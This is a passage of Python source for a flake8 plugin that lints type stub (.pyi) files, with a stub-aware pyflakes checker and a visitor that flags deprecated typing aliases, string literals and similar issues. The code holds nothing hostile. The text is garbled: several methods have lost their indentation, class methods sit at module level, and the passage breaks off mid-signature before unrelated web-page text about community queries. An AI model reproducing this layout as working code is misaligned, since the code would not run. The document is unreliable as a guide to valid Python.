        "runtime_checkable",
        "ClassVar",
        "NewType",
        "overload",
        "Text",
        "NoReturn",
    }
)
# Y027: typing aliases with a canonical home in contextlib/collections.
_BAD_Y027_IMPORTS = {
    "typing.ContextManager": "contextlib.AbstractContextManager",
    "typing.OrderedDict": "collections.OrderedDict",
    "typing_extensions.OrderedDict": "collections.OrderedDict",
}
class PyiAwareFlakesChecker(FlakesChecker):
    def deferHandleNode(self, node, parent):
        # Schedule handleNode(node, parent) to run in pyflakes' deferred
        # phase (after the whole module has been bound), which allows
        # forward references in stub files.
        self.deferFunction(lambda: self.handleNode(node, parent))
def ASSIGN(self, node):
"""This is a custom implementation of ASSIGN derived from
handleChildren() in pyflakes 1.3.0.
The point here is that on module level, there's type aliases that we
want to bind eagerly, but defer computation of the values of the
assignments (the type aliases might have forward references).
"""
if not isinstance(self.scope, ModuleScope):
return super().ASSIGN(node)
for target in node.targets:
self.handleNode(target, node)
self.deferHandleNode(node.value, node)
def ANNASSIGN(self, node):
"""
Annotated assignments don't have annotations evaluated on function
scope, hence the custom implementation. Compared to the pyflakes
version, we defer evaluation of the annotations (and values on
module level).
"""
if node.value:
# Only bind the *target* if the assignment has value.
# Otherwise it's not really ast.Store and shouldn't silence
# UndefinedLocal warnings.
self.handleNode(node.target, node)
if not isinstance(self.scope, FunctionScope):
self.deferHandleNode(node.annotation, node)
if node.value:
# If the assignment has value, handle the *value*...
if isinstance(self.scope, ModuleScope):
# ...later (if module scope).
self.deferHandleNode(node.value, node)
else:
# ...now.
self.handleNode(node.value, node)
def LAMBDA(self, node):
"""This is likely very brittle, currently works for pyflakes 1.3.0.
Deferring annotation handling depends on the fact that during calls
to LAMBDA visiting the function's body is already deferred and the
only eager calls to `handleNode` are for annotations.
"""
self.handleNode, self.deferHandleNode = self.deferHandleNode, self.handleNode
super().LAMBDA(node)
self.handleNode, self.deferHandleNode = self.deferHandleNode, self.handleNode
def CLASSDEF(self, node):
if not isinstance(self.scope, ModuleScope):
# This shouldn't be necessary because .pyi files don't nest
# scopes much, but better safe than sorry.
return super().CLASSDEF(node)
# What follows is copied from pyflakes 1.3.0. The only changes are the
# deferHandleNode calls.
for decorator in node.decorator_list:
self.handleNode(decorator, node)
for baseNode in node.bases:
self.deferHandleNode(baseNode, node)
if not PY2:
for keywordNode in node.keywords:
self.deferHandleNode(keywordNode, node)
self.pushScope(ClassScope)
# doctest does not process doctest within a doctest
# classes within classes are processed.
if (
self.withDoctest
and not self._in_doctest()
and not isinstance(self.scope, FunctionScope)
):
self.deferFunction(lambda: self.handleDoctests(node))
for stmt in node.body:
self.handleNode(stmt, node)
self.popScope()
self.addBinding(node, ClassDefinition(node.name, node))
def handleNodeDelete(self, node):
"""Null implementation.
Lets users use `del` in stubs to denote private names.
"""
return
class PyiAwareFileChecker(checker.FileChecker):
    """FileChecker that substitutes PyiAwareFlakesChecker when linting stubs."""

    def run_check(self, plugin, **kwargs):
        """Run one plugin check, swapping in the stub-aware pyflakes checker
        for .pyi files.

        When reading from stdin, the display name supplied via options is
        used to decide whether the input is a stub.
        """
        filename = (
            self.options.stdin_display_name
            if self.filename == "-"
            else self.filename
        )
        is_flakes_on_stub = (
            plugin["plugin"] == FlakesChecker and filename.endswith(".pyi")
        )
        if is_flakes_on_stub:
            LOG.info(
                "Replacing FlakesChecker with PyiAwareFlakesChecker while "
                "checking %r",
                filename,
            )
            # Copy before mutating so the shared plugin registry is untouched.
            plugin = dict(plugin)
            plugin["plugin"] = PyiAwareFlakesChecker
        return super().run_check(plugin, **kwargs)
class LegacyNormalizer(ast.NodeTransformer):
    """Transform AST to be consistent across Python versions."""

    # Only needed on interpreters that still produce ast.Index nodes.
    if sys.version_info < (3, 9):

        def visit_Index(self, node: ast.Index) -> ast.expr:
            """Index nodes no longer exist in Python 3.9.

            For example, consider the AST representing Union[str, int].
            Before 3.9: Subscript(value=Name(id='Union'), slice=Index(value=Tuple(...)))
            3.9 and newer: Subscript(value=Name(id='Union'), slice=Tuple(...))
            """
            # Unwrap: replace Index(value=X) with X itself.
            return node.value
@dataclass
class PyiVisitor(ast.NodeVisitor):
    """AST visitor that collects stub-file (Y0xx) lint errors."""

    # Path of the file being checked (display only; "(none)" by default).
    filename: Path = Path("(none)")
    # Accumulated Error records, appended to as nodes are visited.
    errors: list[Error] = field(default_factory=list)
    # Mapping of all private TypeVars/ParamSpecs/TypeVarTuples to the nodes where they're defined
    typevarlike_defs: dict[TypeVarInfo, ast.Assign] = field(default_factory=dict)
    # Mapping of each name in the file to the no. of occurrences
    all_name_occurrences: Counter[str] = field(default_factory=Counter)
    # Depth counters: >0 while visiting inside a class / def / context
    # that permits string literals, respectively.
    _class_nesting: int = 0
    _function_nesting: int = 0
    _allow_string_literals: int = 0
@contextmanager
def allow_string_literals(self) -> Iterator[None]:
    """Re-entrant context manager: string literals are permitted while
    at least one of these contexts is active."""
    self._allow_string_literals = self._allow_string_literals + 1
    try:
        yield
    finally:
        # Always restore the counter, even if the body raised.
        self._allow_string_literals = self._allow_string_literals - 1
@property
def string_literals_allowed(self) -> bool:
    """Whether string literals are currently permitted (counter is nonzero)."""
    return self._allow_string_literals != 0
@property
def in_function(self) -> bool:
    """Whether the visitor is currently inside a `def` statement."""
    return self._function_nesting != 0
@property
def in_class(self) -> bool:
    """Whether the visitor is currently inside a `class` statement."""
    return self._class_nesting != 0
def _check_import_or_attribute(
    self, node: ast.Attribute | ast.ImportFrom, module_name: str, object_name: str
) -> None:
    """Report Y022/Y027/Y023/Y024 for deprecated aliases referenced either
    via `from module import name` or via `module.name` attribute access.
    """
    fullname = f"{module_name}.{object_name}"

    # Y022: alias with a plain builtins/collections/contextlib replacement.
    if fullname in _BAD_Y022_IMPORTS:
        self.error(
            node,
            Y022.format(
                good_cls_name=f'"{_BAD_Y022_IMPORTS[fullname]}"',
                bad_cls_alias=fullname,
            ),
        )
        return

    # Y027: alias whose replacement lives in collections/contextlib.
    if fullname in _BAD_Y027_IMPORTS:
        self.error(
            node,
            Y027.format(
                good_cls_name=f'"{_BAD_Y027_IMPORTS[fullname]}"',
                bad_cls_alias=fullname,
            ),
        )
        return

    # Y023: typing_extensions re-exports that should come from typing,
    # with ContextManager special-cased (see _BAD_Y023_IMPORTS comment).
    if module_name == "typing_extensions":
        if object_name in _BAD_Y023_IMPORTS:
            self.error(
                node,
                Y023.format(
                    good_cls_name=f'"typing.{object_name}"',
                    bad_cls_alias=f"typing_extensions.{object_name}",
                ),
            )
        elif object_name == "ContextManager":
            suggestion = (
                '"contextlib.AbstractContextManager" '
                '(or "typing.ContextManager" in Python 2-compatible code)'
            )
            self.error(
                node,
                Y023.format(
                    good_cls_name=suggestion,
                    bad_cls_alias="typing_extensions.ContextManager",
                ),
            )
        return

    # Y024: collections.namedtuple in a stub.
    if fullname == "collections.namedtuple":
        self.error(node, Y024)
def visit_Attribute(self, node: ast.Attribute) -> None:
    """Check dotted accesses like `typing.Dict` for deprecated aliases."""
    self.generic_visit(node)
    base = node.value
    # Only simple `name.attr` accesses are checked; anything more complex
    # (e.g. chained attributes) is ignored.
    if isinstance(base, ast.Name):
        self._check_import_or_attribute(
            node=node, module_name=base.id, object_name=node.attr
        )
def visit_ImportFrom(self, node: ast.ImportFrom) -> None:
    """Check `from module import ...` statements for deprecated aliases."""
    module_name = node.module
    # Relative imports like `from . import x` have module=None.
    if module_name is None:
        return
    aliases = node.names
    if module_name == "collections.abc":
        # Y025: `Set` must be renamed to `AbstractSet` on import.
        for alias in aliases:
            if alias.name == "Set" and alias.asname != "AbstractSet":
                return self.error(node, Y025)
    for alias in aliases:
        self._check_import_or_attribute(
            node=node, module_name=module_name, object_name=alias.name
        )
def visit_Assign(self, node: ast.Assign) -> None:
    """Check module/class-level assignments: Y017 (complex targets),
    Y001 (public TypeVar-likes), Y015 (literal values), Y026 (aliases
    without an explicit TypeAlias annotation)."""
    if self.in_function:
        # We error for unexpected things within functions separately.
        self.generic_visit(node)
        return
    # Y017: only a single plain-name target is acceptable in a stub.
    if len(node.targets) == 1:
        target = node.targets[0]
        if isinstance(target, ast.Name):
            target_name = target.id
        else:
            self.error(node, Y017)
            target_name = None
    else:
        self.error(node, Y017)
        target_name = None
    # __all__ legitimately contains string literals; suppress Y020 inside it.
    if target_name == "__all__":
        with self.allow_string_literals():
            self.generic_visit(node)
    else:
        self.generic_visit(node)
    if target_name is None:
        return
    assignment = node.value
    # Attempt to find assignments to type helpers (typevars and aliases),
    # which should usually be private. If they are private,
    # they should be used at least once in the file in which they are defined.
    if isinstance(assignment, ast.Call) and isinstance(assignment.func, ast.Name):
        cls_name = assignment.func.id
        if cls_name in ("TypeVar", "ParamSpec", "TypeVarTuple"):
            if target_name.startswith("_"):
                # Private: remember it so unused ones can be reported later.
                target_info = TypeVarInfo(cls_name=cls_name, name=target_name)
                self.typevarlike_defs[target_info] = node
            else:
                # Y001: TypeVar-likes should be private (underscore-prefixed).
                self.error(target, Y001.format(cls_name))
    # Y015: assigning a bare literal (number/str/bytes) to a name.
    if isinstance(node.value, (ast.Num, ast.Str, ast.Bytes)):
        self.error(node.value, Y015)
    # We avoid triggering Y026 for calls and = ... because there are various
    # unusual cases where assignment to the result of a call is legitimate
    # in stubs.
    elif target_name != "__all__" and not isinstance(
        node.value, (ast.Ellipsis, ast.Call)
    ):
        self.error(node, Y026)
def visit_Name(self, node: ast.Name) -> None:
    """Record one occurrence of this name in the per-file counter."""
    self.all_name_occurrences.update((node.id,))
def visit_Call(self, node: ast.Call) -> None:
    """Check calls: Y028 for functional NamedTuple syntax, and visit
    arguments with the appropriate string-literal policy."""
    function = node.func
    self.visit(function)

    # Y028: `NamedTuple(...)` called directly by name...
    if isinstance(function, ast.Name) and function.id == "NamedTuple":
        return self.error(node, Y028)
    # ...or as `typing.NamedTuple(...)`.
    if (
        isinstance(function, ast.Attribute)
        and isinstance(function.value, ast.Name)
        and function.value.id == "typing"
        and function.attr == "NamedTuple"
    ):
        return self.error(node, Y028)

    # String literals can appear in positional arguments for
    # TypeVar definitions.
    with self.allow_string_literals():
        for positional in node.args:
            self.visit(positional)
    # But in keyword arguments they're most likely TypeVar bounds,
    # which should not be quoted.
    for keyword in node.keywords:
        self.visit(keyword)
# 3.8+
def visit_Constant(self, node: ast.Constant) -> None:
    """Y020: flag string constants unless string literals are allowed here."""
    if isinstance(node.value, str) and not self.string_literals_allowed:
        self.error(node, Y020)
# 3.7 and lower
def visit_Str(self, node: ast.Str) -> None:
    """Y020: legacy counterpart of visit_Constant for older ASTs."""
    if self.string_literals_allowed:
        return
    self.error(node, Y020)
def visit_Expr(self, node: ast.Expr) -> None:
    """Y021: a bare string expression statement (e.g. a docstring) in a stub."""
    if not isinstance(node.value, ast.Str):
        self.generic_visit(node)
        return
    self.error(node, Y021)
def visit_AnnAssign(self, node: ast.AnnAssign) -> None:
    """Y015: annotated assignments should use `...` as the value, except
    explicit `x: TypeAlias = ...` declarations, which are exempt."""
    self.generic_visit(node)
    annotation = node.annotation
    if isinstance(annotation, ast.Name) and annotation.id == "TypeAlias":
        return
    value = node.value
    # AST nodes are always truthy, so this matches any non-None value.
    if value is not None and not isinstance(value, ast.Ellipsis):
        self.error(value, Y015)
def _check_union_members(self, members: |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.